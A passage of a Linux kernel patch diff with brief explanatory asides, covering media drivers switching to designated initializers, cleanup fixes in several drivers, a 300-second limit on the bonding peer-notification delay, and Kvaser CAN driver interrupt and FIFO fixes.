+-	memset(&sel, 0, sizeof(sel));
+-	sel.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 	sel.pad = RWPF_PAD_SINK;
+ 	sel.target = V4L2_SEL_TGT_CROP;
+ 	sel.r = *crop;
+diff --git a/drivers/media/platform/renesas/vsp1/vsp1_entity.c b/drivers/media/platform/renesas/vsp1/vsp1_entity.c
+index 4c3bd2b1ca287..c31f05a80bb56 100644
+--- a/drivers/media/platform/renesas/vsp1/vsp1_entity.c
++++ b/drivers/media/platform/renesas/vsp1/vsp1_entity.c
+@@ -184,15 +184,14 @@ vsp1_entity_get_pad_selection(struct vsp1_entity *entity,
+ int vsp1_entity_init_cfg(struct v4l2_subdev *subdev,
+ 			 struct v4l2_subdev_state *sd_state)
+ {
+-	struct v4l2_subdev_format format;
+ 	unsigned int pad;
+ 
+ 	for (pad = 0; pad < subdev->entity.num_pads - 1; ++pad) {
+-		memset(&format, 0, sizeof(format));
+-
+-		format.pad = pad;
+-		format.which = sd_state ? V4L2_SUBDEV_FORMAT_TRY
+-			     : V4L2_SUBDEV_FORMAT_ACTIVE;
++		struct v4l2_subdev_format format = {
++			.pad = pad,
++			.which = sd_state ? V4L2_SUBDEV_FORMAT_TRY
++			       : V4L2_SUBDEV_FORMAT_ACTIVE,
++		};
+ 
+ 		v4l2_subdev_call(subdev, pad, set_fmt, sd_state, &format);
+ 	}
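
The vsp1 hunks above (and several media hunks below) replace memset() plus field assignments with designated initializers. C99 guarantees that members not named in the initializer are zeroed, so the struct can no longer be used before it is cleared:

#include <stdio.h>

struct fmt { int which, pad, width; };

int main(void)
{
	/* Members not listed are zero-initialized, so this equals
	 * memset(&f, 0, sizeof(f)) followed by two assignments, but
	 * the zeroing cannot drift away from the declaration. */
	struct fmt f = { .which = 1, .pad = 2 };

	printf("width = %d\n", f.width);        /* 0, guaranteed by C99 */
	return 0;
}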
+diff --git a/drivers/media/platform/samsung/exynos4-is/fimc-capture.c b/drivers/media/platform/samsung/exynos4-is/fimc-capture.c
+index e3b95a2b7e040..beaee54ee73bf 100644
+--- a/drivers/media/platform/samsung/exynos4-is/fimc-capture.c
++++ b/drivers/media/platform/samsung/exynos4-is/fimc-capture.c
+@@ -763,7 +763,10 @@ static int fimc_pipeline_try_format(struct fimc_ctx *ctx,
+ 	struct fimc_dev *fimc = ctx->fimc_dev;
+ 	struct fimc_pipeline *p = to_fimc_pipeline(fimc->vid_cap.ve.pipe);
+ 	struct v4l2_subdev *sd = p->subdevs[IDX_SENSOR];
+-	struct v4l2_subdev_format sfmt;
++	struct v4l2_subdev_format sfmt = {
++		.which = set ? V4L2_SUBDEV_FORMAT_ACTIVE
++		       : V4L2_SUBDEV_FORMAT_TRY,
++	};
+ 	struct v4l2_mbus_framefmt *mf = &sfmt.format;
+ 	struct media_entity *me;
+ 	struct fimc_fmt *ffmt;
+@@ -774,9 +777,7 @@ static int fimc_pipeline_try_format(struct fimc_ctx *ctx,
+ 	if (WARN_ON(!sd || !tfmt))
+ 		return -EINVAL;
+ 
+-	memset(&sfmt, 0, sizeof(sfmt));
+ 	sfmt.format = *tfmt;
+-	sfmt.which = set ? V4L2_SUBDEV_FORMAT_ACTIVE : V4L2_SUBDEV_FORMAT_TRY;
+ 
+ 	me = fimc_pipeline_get_head(&sd->entity);
+ 
+diff --git a/drivers/media/platform/ti/am437x/am437x-vpfe.c b/drivers/media/platform/ti/am437x/am437x-vpfe.c
+index 2dfae9bc0bba8..dffac89cbd210 100644
+--- a/drivers/media/platform/ti/am437x/am437x-vpfe.c
++++ b/drivers/media/platform/ti/am437x/am437x-vpfe.c
+@@ -1499,7 +1499,9 @@ static int vpfe_enum_size(struct file *file, void  *priv,
+ 			  struct v4l2_frmsizeenum *fsize)
+ {
+ 	struct vpfe_device *vpfe = video_drvdata(file);
+-	struct v4l2_subdev_frame_size_enum fse;
++	struct v4l2_subdev_frame_size_enum fse = {
++		.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++	};
+ 	struct v4l2_subdev *sd = vpfe->current_subdev->sd;
+ 	struct vpfe_fmt *fmt;
+ 	int ret;
+@@ -1514,11 +1516,9 @@ static int vpfe_enum_size(struct file *file, void  *priv,
+ 
+ 	memset(fsize->reserved, 0x0, sizeof(fsize->reserved));
+ 
+-	memset(&fse, 0x0, sizeof(fse));
+ 	fse.index = fsize->index;
+ 	fse.pad = 0;
+ 	fse.code = fmt->code;
+-	fse.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 	ret = v4l2_subdev_call(sd, pad, enum_frame_size, NULL, &fse);
+ 	if (ret)
+ 		return ret;
+@@ -2146,7 +2146,6 @@ vpfe_async_bound(struct v4l2_async_notifier *notifier,
+ {
+ 	struct vpfe_device *vpfe = container_of(notifier->v4l2_dev,
+ 					       struct vpfe_device, v4l2_dev);
+-	struct v4l2_subdev_mbus_code_enum mbus_code;
+ 	struct vpfe_subdev_info *sdinfo;
+ 	struct vpfe_fmt *fmt;
+ 	int ret = 0;
+@@ -2173,9 +2172,11 @@ vpfe_async_bound(struct v4l2_async_notifier *notifier,
+ 
+ 	vpfe->num_active_fmt = 0;
+ 	for (j = 0, i = 0; (ret != -EINVAL); ++j) {
+-		memset(&mbus_code, 0, sizeof(mbus_code));
+-		mbus_code.index = j;
+-		mbus_code.which = V4L2_SUBDEV_FORMAT_ACTIVE;
++		struct v4l2_subdev_mbus_code_enum mbus_code = {
++			.index = j,
++			.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++		};
++
+ 		ret = v4l2_subdev_call(subdev, pad, enum_mbus_code,
+ 				       NULL, &mbus_code);
+ 		if (ret)
+diff --git a/drivers/media/platform/ti/cal/cal-video.c b/drivers/media/platform/ti/cal/cal-video.c
+index 4eade409d5d36..bbfd2719725aa 100644
+--- a/drivers/media/platform/ti/cal/cal-video.c
++++ b/drivers/media/platform/ti/cal/cal-video.c
+@@ -811,7 +811,6 @@ static const struct v4l2_file_operations cal_fops = {
+ 
+ static int cal_ctx_v4l2_init_formats(struct cal_ctx *ctx)
+ {
+-	struct v4l2_subdev_mbus_code_enum mbus_code;
+ 	struct v4l2_mbus_framefmt mbus_fmt;
+ 	const struct cal_format_info *fmtinfo;
+ 	unsigned int i, j, k;
+@@ -826,10 +825,11 @@ static int cal_ctx_v4l2_init_formats(struct cal_ctx *ctx)
+ 	ctx->num_active_fmt = 0;
+ 
+ 	for (j = 0, i = 0; ; ++j) {
++		struct v4l2_subdev_mbus_code_enum mbus_code = {
++			.index = j,
++			.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++		};
+ 
+-		memset(&mbus_code, 0, sizeof(mbus_code));
+-		mbus_code.index = j;
+-		mbus_code.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 		ret = v4l2_subdev_call(ctx->phy->source, pad, enum_mbus_code,
+ 				       NULL, &mbus_code);
+ 		if (ret == -EINVAL)
+diff --git a/drivers/media/usb/dvb-usb/cxusb-analog.c b/drivers/media/usb/dvb-usb/cxusb-analog.c
+index e93183ddd7975..deba5224cb8df 100644
+--- a/drivers/media/usb/dvb-usb/cxusb-analog.c
++++ b/drivers/media/usb/dvb-usb/cxusb-analog.c
+@@ -1014,7 +1014,10 @@ static int cxusb_medion_try_s_fmt_vid_cap(struct file *file,
+ {
+ 	struct dvb_usb_device *dvbdev = video_drvdata(file);
+ 	struct cxusb_medion_dev *cxdev = dvbdev->priv;
+-	struct v4l2_subdev_format subfmt;
++	struct v4l2_subdev_format subfmt = {
++		.which = isset ? V4L2_SUBDEV_FORMAT_ACTIVE :
++			 V4L2_SUBDEV_FORMAT_TRY,
++	};
+ 	u32 field;
+ 	int ret;
+ 
+@@ -1024,9 +1027,6 @@ static int cxusb_medion_try_s_fmt_vid_cap(struct file *file,
+ 	field = vb2_start_streaming_called(&cxdev->videoqueue) ?
+ 		cxdev->field_order : cxusb_medion_field_order(cxdev);
+ 
+-	memset(&subfmt, 0, sizeof(subfmt));
+-	subfmt.which = isset ? V4L2_SUBDEV_FORMAT_ACTIVE :
+-		V4L2_SUBDEV_FORMAT_TRY;
+ 	subfmt.format.width = f->fmt.pix.width & ~1;
+ 	subfmt.format.height = f->fmt.pix.height & ~1;
+ 	subfmt.format.code = MEDIA_BUS_FMT_FIXED;
+@@ -1464,7 +1464,9 @@ int cxusb_medion_analog_init(struct dvb_usb_device *dvbdev)
+ 					    .buf = tuner_analog_msg_data,
+ 					    .len =
+ 					    sizeof(tuner_analog_msg_data) };
+-	struct v4l2_subdev_format subfmt;
++	struct v4l2_subdev_format subfmt = {
++		.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++	};
+ 	int ret;
+ 
+ 	/* switch tuner to analog mode so IF demod will become accessible */
+@@ -1507,8 +1509,6 @@ int cxusb_medion_analog_init(struct dvb_usb_device *dvbdev)
+ 	v4l2_subdev_call(cxdev->tuner, video, s_std, cxdev->norm);
+ 	v4l2_subdev_call(cxdev->cx25840, video, s_std, cxdev->norm);
+ 
+-	memset(&subfmt, 0, sizeof(subfmt));
+-	subfmt.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 	subfmt.format.width = cxdev->width;
+ 	subfmt.format.height = cxdev->height;
+ 	subfmt.format.code = MEDIA_BUS_FMT_FIXED;
+diff --git a/drivers/media/usb/pvrusb2/Kconfig b/drivers/media/usb/pvrusb2/Kconfig
+index f2b64e49c5a20..9501b10b31aa5 100644
+--- a/drivers/media/usb/pvrusb2/Kconfig
++++ b/drivers/media/usb/pvrusb2/Kconfig
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ config VIDEO_PVRUSB2
+ 	tristate "Hauppauge WinTV-PVR USB2 support"
+-	depends on VIDEO_DEV && I2C
++	depends on VIDEO_DEV && I2C && DVB_CORE
+ 	select VIDEO_TUNER
+ 	select VIDEO_TVEEPROM
+ 	select VIDEO_CX2341X
+diff --git a/drivers/memstick/host/r592.c b/drivers/memstick/host/r592.c
+index 1d35d147552d4..42bfc46842b82 100644
+--- a/drivers/memstick/host/r592.c
++++ b/drivers/memstick/host/r592.c
+@@ -829,7 +829,7 @@ static void r592_remove(struct pci_dev *pdev)
+ 	/* Stop the processing thread.
+ 	That ensures that we won't take any more requests */
+ 	kthread_stop(dev->io_thread);
+-
++	del_timer_sync(&dev->detect_timer);
+ 	r592_enable_device(dev, false);
+ 
+ 	while (!error && dev->req) {
+diff --git a/drivers/message/fusion/mptlan.c b/drivers/message/fusion/mptlan.c
+index 142eb5d5d9df6..de2e7bcf47847 100644
+--- a/drivers/message/fusion/mptlan.c
++++ b/drivers/message/fusion/mptlan.c
+@@ -1433,7 +1433,9 @@ mptlan_remove(struct pci_dev *pdev)
+ {
+ 	MPT_ADAPTER 		*ioc = pci_get_drvdata(pdev);
+ 	struct net_device	*dev = ioc->netdev;
++	struct mpt_lan_priv *priv = netdev_priv(dev);
+ 
++	cancel_delayed_work_sync(&priv->post_buckets_task);
+ 	if(dev != NULL) {
+ 		unregister_netdev(dev);
+ 		free_netdev(dev);
+diff --git a/drivers/mfd/dln2.c b/drivers/mfd/dln2.c
+index 6cd0b0c752d6e..c3149729cec2e 100644
+--- a/drivers/mfd/dln2.c
++++ b/drivers/mfd/dln2.c
+@@ -827,6 +827,7 @@ out_stop_rx:
+ 	dln2_stop_rx_urbs(dln2);
+ 
+ out_free:
++	usb_put_dev(dln2->usb_dev);
+ 	dln2_free(dln2);
+ 
+ 	return ret;
+diff --git a/drivers/mfd/intel-lpss-pci.c b/drivers/mfd/intel-lpss-pci.c
+index dde31c50a6320..699f44ffff0e4 100644
+--- a/drivers/mfd/intel-lpss-pci.c
++++ b/drivers/mfd/intel-lpss-pci.c
+@@ -447,6 +447,21 @@ static const struct pci_device_id intel_lpss_pci_ids[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x7e79), (kernel_ulong_t)&bxt_i2c_info },
+ 	{ PCI_VDEVICE(INTEL, 0x7e7a), (kernel_ulong_t)&bxt_i2c_info },
+ 	{ PCI_VDEVICE(INTEL, 0x7e7b), (kernel_ulong_t)&bxt_i2c_info },
++	/* MTP-S */
++	{ PCI_VDEVICE(INTEL, 0x7f28), (kernel_ulong_t)&bxt_uart_info },
++	{ PCI_VDEVICE(INTEL, 0x7f29), (kernel_ulong_t)&bxt_uart_info },
++	{ PCI_VDEVICE(INTEL, 0x7f2a), (kernel_ulong_t)&tgl_info },
++	{ PCI_VDEVICE(INTEL, 0x7f2b), (kernel_ulong_t)&tgl_info },
++	{ PCI_VDEVICE(INTEL, 0x7f4c), (kernel_ulong_t)&bxt_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0x7f4d), (kernel_ulong_t)&bxt_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0x7f4e), (kernel_ulong_t)&bxt_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0x7f4f), (kernel_ulong_t)&bxt_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0x7f5c), (kernel_ulong_t)&bxt_uart_info },
++	{ PCI_VDEVICE(INTEL, 0x7f5d), (kernel_ulong_t)&bxt_uart_info },
++	{ PCI_VDEVICE(INTEL, 0x7f5e), (kernel_ulong_t)&tgl_info },
++	{ PCI_VDEVICE(INTEL, 0x7f5f), (kernel_ulong_t)&tgl_info },
++	{ PCI_VDEVICE(INTEL, 0x7f7a), (kernel_ulong_t)&bxt_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0x7f7b), (kernel_ulong_t)&bxt_i2c_info },
+ 	/* LKF */
+ 	{ PCI_VDEVICE(INTEL, 0x98a8), (kernel_ulong_t)&bxt_uart_info },
+ 	{ PCI_VDEVICE(INTEL, 0x98a9), (kernel_ulong_t)&bxt_uart_info },
+diff --git a/drivers/mfd/intel_soc_pmic_chtwc.c b/drivers/mfd/intel_soc_pmic_chtwc.c
+index 9216f0d34206c..a82b7cb661b7b 100644
+--- a/drivers/mfd/intel_soc_pmic_chtwc.c
++++ b/drivers/mfd/intel_soc_pmic_chtwc.c
+@@ -159,11 +159,19 @@ static const struct dmi_system_id cht_wc_model_dmi_ids[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Mipad2"),
+ 		},
+ 	}, {
+-		/* Lenovo Yoga Book X90F / X91F / X91L */
++		/* Lenovo Yoga Book X90F / X90L */
+ 		.driver_data = (void *)(long)INTEL_CHT_WC_LENOVO_YOGABOOK1,
+ 		.matches = {
+-			/* Non exact match to match all versions */
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X9"),
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "YETI-11"),
++		},
++	}, {
++		/* Lenovo Yoga Book X91F / X91L */
++		.driver_data = (void *)(long)INTEL_CHT_WC_LENOVO_YOGABOOK1,
++		.matches = {
++			/* Non exact match to match F + L versions */
++			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),
+ 		},
+ 	},
+ 	{ }
+diff --git a/drivers/misc/lkdtm/stackleak.c b/drivers/misc/lkdtm/stackleak.c
+index 025b133297a6b..f1d0221609138 100644
+--- a/drivers/misc/lkdtm/stackleak.c
++++ b/drivers/misc/lkdtm/stackleak.c
+@@ -43,12 +43,14 @@ static void noinstr check_stackleak_irqoff(void)
+ 	 * STACK_END_MAGIC, and in either case something is seriously wrong.
+ 	 */
+ 	if (current_sp < task_stack_low || current_sp >= task_stack_high) {
++		instrumentation_begin();
+ 		pr_err("FAIL: current_stack_pointer (0x%lx) outside of task stack bounds [0x%lx..0x%lx]\n",
+ 		       current_sp, task_stack_low, task_stack_high - 1);
+ 		test_failed = true;
+ 		goto out;
+ 	}
+ 	if (lowest_sp < task_stack_low || lowest_sp >= task_stack_high) {
++		instrumentation_begin();
+ 		pr_err("FAIL: current->lowest_stack (0x%lx) outside of task stack bounds [0x%lx..0x%lx]\n",
+ 		       lowest_sp, task_stack_low, task_stack_high - 1);
+ 		test_failed = true;
+@@ -86,11 +88,14 @@ static void noinstr check_stackleak_irqoff(void)
+ 		if (*(unsigned long *)poison_low == STACKLEAK_POISON)
+ 			continue;
+ 
++		instrumentation_begin();
+ 		pr_err("FAIL: non-poison value %lu bytes below poison boundary: 0x%lx\n",
+ 		       poison_high - poison_low, *(unsigned long *)poison_low);
+ 		test_failed = true;
++		goto out;
+ 	}
+ 
++	instrumentation_begin();
+ 	pr_info("stackleak stack usage:\n"
+ 		"  high offset: %lu bytes\n"
+ 		"  current:     %lu bytes\n"
+@@ -113,6 +118,7 @@ out:
+ 	} else {
+ 		pr_info("OK: the rest of the thread stack is properly erased\n");
+ 	}
++	instrumentation_end();
+ }
+ 
+ static void lkdtm_STACKLEAK_ERASING(void)
+diff --git a/drivers/net/bonding/bond_netlink.c b/drivers/net/bonding/bond_netlink.c
+index c2d080fc4fc4e..27cbe148f0db5 100644
+--- a/drivers/net/bonding/bond_netlink.c
++++ b/drivers/net/bonding/bond_netlink.c
+@@ -84,6 +84,11 @@ nla_put_failure:
+ 	return -EMSGSIZE;
+ }
+ 
++/* Limit the max delay range to 300s */
++static struct netlink_range_validation delay_range = {
++	.max = 300000,
++};
++
+ static const struct nla_policy bond_policy[IFLA_BOND_MAX + 1] = {
+ 	[IFLA_BOND_MODE]		= { .type = NLA_U8 },
+ 	[IFLA_BOND_ACTIVE_SLAVE]	= { .type = NLA_U32 },
+@@ -114,7 +119,7 @@ static const struct nla_policy bond_policy[IFLA_BOND_MAX + 1] = {
+ 	[IFLA_BOND_AD_ACTOR_SYSTEM]	= { .type = NLA_BINARY,
+ 					    .len  = ETH_ALEN },
+ 	[IFLA_BOND_TLB_DYNAMIC_LB]	= { .type = NLA_U8 },
+-	[IFLA_BOND_PEER_NOTIF_DELAY]    = { .type = NLA_U32 },
++	[IFLA_BOND_PEER_NOTIF_DELAY]    = NLA_POLICY_FULL_RANGE(NLA_U32, &delay_range),
+ 	[IFLA_BOND_MISSED_MAX]		= { .type = NLA_U8 },
+ 	[IFLA_BOND_NS_IP6_TARGET]	= { .type = NLA_NESTED },
+ };
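
With NLA_POLICY_FULL_RANGE, the bound is enforced during attribute parsing, so bond_option_peer_notif_delay_set() never sees an out-of-range value. A minimal sketch of the pattern (attribute names are hypothetical, and this is an in-kernel fragment rather than standalone code):

#include <net/netlink.h>

enum { EXAMPLE_ATTR_UNSPEC, EXAMPLE_ATTR_DELAY, __EXAMPLE_ATTR_MAX };

/* Values above 300000 ms are rejected by attribute parsing before
 * the driver's set handler runs. */
static struct netlink_range_validation example_delay_range = {
	.max = 300000,
};

static const struct nla_policy example_policy[__EXAMPLE_ATTR_MAX] = {
	[EXAMPLE_ATTR_DELAY] = NLA_POLICY_FULL_RANGE(NLA_U32, &example_delay_range),
};

The matching option-table limit appears in the bond_options.c hunk that follows.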
+diff --git a/drivers/net/bonding/bond_options.c b/drivers/net/bonding/bond_options.c
+index 3498db1c1b3c7..5bb2c098bf4df 100644
+--- a/drivers/net/bonding/bond_options.c
++++ b/drivers/net/bonding/bond_options.c
+@@ -169,6 +169,12 @@ static const struct bond_opt_value bond_num_peer_notif_tbl[] = {
+ 	{ NULL,      -1,  0}
+ };
+ 
++static const struct bond_opt_value bond_peer_notif_delay_tbl[] = {
++	{ "off",     0,   0},
++	{ "maxval",  300000, BOND_VALFLAG_MAX},
++	{ NULL,      -1,  0}
++};
++
+ static const struct bond_opt_value bond_primary_reselect_tbl[] = {
+ 	{ "always",  BOND_PRI_RESELECT_ALWAYS,  BOND_VALFLAG_DEFAULT},
+ 	{ "better",  BOND_PRI_RESELECT_BETTER,  0},
+@@ -488,7 +494,7 @@ static const struct bond_option bond_opts[BOND_OPT_LAST] = {
+ 		.id = BOND_OPT_PEER_NOTIF_DELAY,
+ 		.name = "peer_notif_delay",
+ 		.desc = "Delay between each peer notification on failover event, in milliseconds",
+-		.values = bond_intmax_tbl,
++		.values = bond_peer_notif_delay_tbl,
+ 		.set = bond_option_peer_notif_delay_set
+ 	}
+ };
+diff --git a/drivers/net/can/dev/skb.c b/drivers/net/can/dev/skb.c
+index 241ec636e91fd..f6d05b3ef59ab 100644
+--- a/drivers/net/can/dev/skb.c
++++ b/drivers/net/can/dev/skb.c
+@@ -54,7 +54,8 @@ int can_put_echo_skb(struct sk_buff *skb, struct net_device *dev,
+ 	/* check flag whether this packet has to be looped back */
+ 	if (!(dev->flags & IFF_ECHO) ||
+ 	    (skb->protocol != htons(ETH_P_CAN) &&
+-	     skb->protocol != htons(ETH_P_CANFD))) {
++	     skb->protocol != htons(ETH_P_CANFD) &&
++	     skb->protocol != htons(ETH_P_CANXL))) {
+ 		kfree_skb(skb);
+ 		return 0;
+ 	}
+diff --git a/drivers/net/can/kvaser_pciefd.c b/drivers/net/can/kvaser_pciefd.c
+index bcad11709bc98..956a4a57396f9 100644
+--- a/drivers/net/can/kvaser_pciefd.c
++++ b/drivers/net/can/kvaser_pciefd.c
+@@ -71,10 +71,12 @@ MODULE_DESCRIPTION("CAN driver for Kvaser CAN/PCIe devices");
+ #define KVASER_PCIEFD_SYSID_BUILD_REG (KVASER_PCIEFD_SYSID_BASE + 0x14)
+ /* Shared receive buffer registers */
+ #define KVASER_PCIEFD_SRB_BASE 0x1f200
++#define KVASER_PCIEFD_SRB_FIFO_LAST_REG (KVASER_PCIEFD_SRB_BASE + 0x1f4)
+ #define KVASER_PCIEFD_SRB_CMD_REG (KVASER_PCIEFD_SRB_BASE + 0x200)
+ #define KVASER_PCIEFD_SRB_IEN_REG (KVASER_PCIEFD_SRB_BASE + 0x204)
+ #define KVASER_PCIEFD_SRB_IRQ_REG (KVASER_PCIEFD_SRB_BASE + 0x20c)
+ #define KVASER_PCIEFD_SRB_STAT_REG (KVASER_PCIEFD_SRB_BASE + 0x210)
++#define KVASER_PCIEFD_SRB_RX_NR_PACKETS_REG (KVASER_PCIEFD_SRB_BASE + 0x214)
+ #define KVASER_PCIEFD_SRB_CTRL_REG (KVASER_PCIEFD_SRB_BASE + 0x218)
+ /* EPCS flash controller registers */
+ #define KVASER_PCIEFD_SPI_BASE 0x1fc00
+@@ -111,6 +113,9 @@ MODULE_DESCRIPTION("CAN driver for Kvaser CAN/PCIe devices");
+ /* DMA support */
+ #define KVASER_PCIEFD_SRB_STAT_DMA BIT(24)
+ 
++/* SRB current packet level */
++#define KVASER_PCIEFD_SRB_RX_NR_PACKETS_MASK 0xff
++
+ /* DMA Enable */
+ #define KVASER_PCIEFD_SRB_CTRL_DMA_ENABLE BIT(0)
+ 
+@@ -526,7 +531,7 @@ static int kvaser_pciefd_set_tx_irq(struct kvaser_pciefd_can *can)
+ 	      KVASER_PCIEFD_KCAN_IRQ_TOF | KVASER_PCIEFD_KCAN_IRQ_ABD |
+ 	      KVASER_PCIEFD_KCAN_IRQ_TAE | KVASER_PCIEFD_KCAN_IRQ_TAL |
+ 	      KVASER_PCIEFD_KCAN_IRQ_FDIC | KVASER_PCIEFD_KCAN_IRQ_BPP |
+-	      KVASER_PCIEFD_KCAN_IRQ_TAR | KVASER_PCIEFD_KCAN_IRQ_TFD;
++	      KVASER_PCIEFD_KCAN_IRQ_TAR;
+ 
+ 	iowrite32(msk, can->reg_base + KVASER_PCIEFD_KCAN_IEN_REG);
+ 
+@@ -554,6 +559,8 @@ static void kvaser_pciefd_setup_controller(struct kvaser_pciefd_can *can)
+ 
+ 	if (can->can.ctrlmode & CAN_CTRLMODE_LISTENONLY)
+ 		mode |= KVASER_PCIEFD_KCAN_MODE_LOM;
++	else
++		mode &= ~KVASER_PCIEFD_KCAN_MODE_LOM;
+ 
+ 	mode |= KVASER_PCIEFD_KCAN_MODE_EEN;
+ 	mode |= KVASER_PCIEFD_KCAN_MODE_EPEN;
+@@ -572,7 +579,7 @@ static void kvaser_pciefd_start_controller_flush(struct kvaser_pciefd_can *can)
+ 
+ 	spin_lock_irqsave(&can->lock, irq);
+ 	iowrite32(-1, can->reg_base + KVASER_PCIEFD_KCAN_IRQ_REG);
+-	iowrite32(KVASER_PCIEFD_KCAN_IRQ_ABD | KVASER_PCIEFD_KCAN_IRQ_TFD,
++	iowrite32(KVASER_PCIEFD_KCAN_IRQ_ABD,
+ 		  can->reg_base + KVASER_PCIEFD_KCAN_IEN_REG);
+ 
+ 	status = ioread32(can->reg_base + KVASER_PCIEFD_KCAN_STAT_REG);
+@@ -615,7 +622,7 @@ static int kvaser_pciefd_bus_on(struct kvaser_pciefd_can *can)
+ 	iowrite32(0, can->reg_base + KVASER_PCIEFD_KCAN_IEN_REG);
+ 	iowrite32(-1, can->reg_base + KVASER_PCIEFD_KCAN_IRQ_REG);
+ 
+-	iowrite32(KVASER_PCIEFD_KCAN_IRQ_ABD | KVASER_PCIEFD_KCAN_IRQ_TFD,
++	iowrite32(KVASER_PCIEFD_KCAN_IRQ_ABD,
+ 		  can->reg_base + KVASER_PCIEFD_KCAN_IEN_REG);
+ 
+ 	mode = ioread32(can->reg_base + KVASER_PCIEFD_KCAN_MODE_REG);
+@@ -719,6 +726,7 @@ static int kvaser_pciefd_stop(struct net_device *netdev)
+ 		iowrite32(0, can->reg_base + KVASER_PCIEFD_KCAN_IEN_REG);
+ 		del_timer(&can->bec_poll_timer);
+ 	}
++	can->can.state = CAN_STATE_STOPPED;
+ 	close_candev(netdev);
+ 
+ 	return ret;
+@@ -1007,8 +1015,7 @@ static int kvaser_pciefd_setup_can_ctrls(struct kvaser_pciefd *pcie)
+ 		SET_NETDEV_DEV(netdev, &pcie->pci->dev);
+ 
+ 		iowrite32(-1, can->reg_base + KVASER_PCIEFD_KCAN_IRQ_REG);
+-		iowrite32(KVASER_PCIEFD_KCAN_IRQ_ABD |
+-			  KVASER_PCIEFD_KCAN_IRQ_TFD,
++		iowrite32(KVASER_PCIEFD_KCAN_IRQ_ABD,
+ 			  can->reg_base + KVASER_PCIEFD_KCAN_IEN_REG);
+ 
+ 		pcie->can[i] = can;
+@@ -1058,6 +1065,7 @@ static int kvaser_pciefd_setup_dma(struct kvaser_pciefd *pcie)
+ {
+ 	int i;
+ 	u32 srb_status;
++	u32 srb_packet_count;
+ 	dma_addr_t dma_addr[KVASER_PCIEFD_DMA_COUNT];
+ 
+ 	/* Disable the DMA */
+@@ -1085,6 +1093,15 @@ static int kvaser_pciefd_setup_dma(struct kvaser_pciefd *pcie)
+ 		  KVASER_PCIEFD_SRB_CMD_RDB1,
+ 		  pcie->reg_base + KVASER_PCIEFD_SRB_CMD_REG);
+ 
++	/* Empty Rx FIFO */
++	srb_packet_count = ioread32(pcie->reg_base + KVASER_PCIEFD_SRB_RX_NR_PACKETS_REG) &
++			   KVASER_PCIEFD_SRB_RX_NR_PACKETS_MASK;
++	while (srb_packet_count) {
++		/* Drop current packet in FIFO */
++		ioread32(pcie->reg_base + KVASER_PCIEFD_SRB_FIFO_LAST_REG);
++		srb_packet_count--;
++	}
++
+ 	srb_status = ioread32(pcie->reg_base + KVASER_PCIEFD_SRB_STAT_REG);
+ 	if (!(srb_status & KVASER_PCIEFD_SRB_STAT_DI)) {
+ 		dev_err(&pcie->pci->dev, "DMA not idle before enabling\n");
+@@ -1425,9 +1442,6 @@ static int kvaser_pciefd_handle_status_packet(struct kvaser_pciefd *pcie,
+ 		cmd = KVASER_PCIEFD_KCAN_CMD_AT;
+ 		cmd |= ++can->cmd_seq << KVASER_PCIEFD_KCAN_CMD_SEQ_SHIFT;
+ 		iowrite32(cmd, can->reg_base + KVASER_PCIEFD_KCAN_CMD_REG);
+-
+-		iowrite32(KVASER_PCIEFD_KCAN_IRQ_TFD,
+-			  can->reg_base + KVASER_PCIEFD_KCAN_IEN_REG);
+ 	} else if (p->header[0] & KVASER_PCIEFD_SPACK_IDET &&
+ 		   p->header[0] & KVASER_PCIEFD_SPACK_IRM &&
+ 		   cmdseq == (p->header[1] & KVASER_PCIEFD_PACKET_SEQ_MSK) &&
+@@ -1714,15 +1728,6 @@ static int kvaser_pciefd_transmit_irq(struct kvaser_pciefd_can *can)
+ 	if (irq & KVASER_PCIEFD_KCAN_IRQ_TOF)
+ 		netdev_err(can->can.dev, "Tx FIFO overflow\n");
+ 
+-	if (irq & KVASER_PCIEFD_KCAN_IRQ_TFD) {
+-		u8 count = ioread32(can->reg_base +
+-				    KVASER_PCIEFD_KCAN_TX_NPACKETS_REG) & 0xff;
+-
+-		if (count == 0)
+-			iowrite32(KVASER_PCIEFD_KCAN_CTRL_EFLUSH,
+-				  can->reg_base + KVASER_PCIEFD_KCAN_CTRL_REG);
+-	}
+-
+ 	if (irq & KVASER_PCIEFD_KCAN_IRQ_BPP)
+ 		netdev_err(can->can.dev,
+ 			   "Fail to change bittiming, when not in reset mode\n");
+@@ -1824,6 +1829,11 @@ static int kvaser_pciefd_probe(struct pci_dev *pdev,
+ 	if (err)
+ 		goto err_teardown_can_ctrls;
+ 
++	err = request_irq(pcie->pci->irq, kvaser_pciefd_irq_handler,
++			  IRQF_SHARED, KVASER_PCIEFD_DRV_NAME, pcie);
++	if (err)
++		goto err_teardown_can_ctrls;
++
+ 	iowrite32(KVASER_PCIEFD_SRB_IRQ_DPD0 | KVASER_PCIEFD_SRB_IRQ_DPD1,
+ 		  pcie->reg_base + KVASER_PCIEFD_SRB_IRQ_REG);
+ 
+@@ -1844,11 +1854,6 @@ static int kvaser_pciefd_probe(struct pci_dev *pdev,
+ 	iowrite32(KVASER_PCIEFD_SRB_CMD_RDB1,
+ 		  pcie->reg_base + KVASER_PCIEFD_SRB_CMD_REG);
+ 
+-	err = request_irq(pcie->pci->irq, kvaser_pciefd_irq_handler,
+-			  IRQF_SHARED, KVASER_PCIEFD_DRV_NAME, pcie);
+-	if (err)
